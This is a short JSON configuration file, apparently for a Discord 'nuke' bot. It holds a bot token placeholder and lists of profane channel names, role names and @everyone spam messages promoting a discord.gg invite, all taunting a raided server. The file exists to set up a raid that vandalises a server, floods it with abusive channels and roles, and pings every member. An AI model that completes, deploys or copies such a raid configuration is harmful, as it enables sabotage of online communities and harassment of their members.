{
    "token": "entre bot token",
    "proxy": false,
    "nuke": {
        "channels_name": [
            "fucked by rich saurabh 8008",
            "fucked by cj official",
            "fucked by cj saurabh",
            "Cj On Top"
        ],
        "roles_name": [
            "You Can't Defeat Cj Official",
            "You Fucked By Cj Official ",
            "Rich Saurabh 8008 Runs Me"
        ],
        "messages_content": [
            "@everyone https://discord.gg/cjontop",
            "@everyone You Fucked By Rich Saurabh 8008 https://discord.gg/cjontop",
            "@everyone Fucked By https://discord.gg/cjontop"
        ]
    }
}
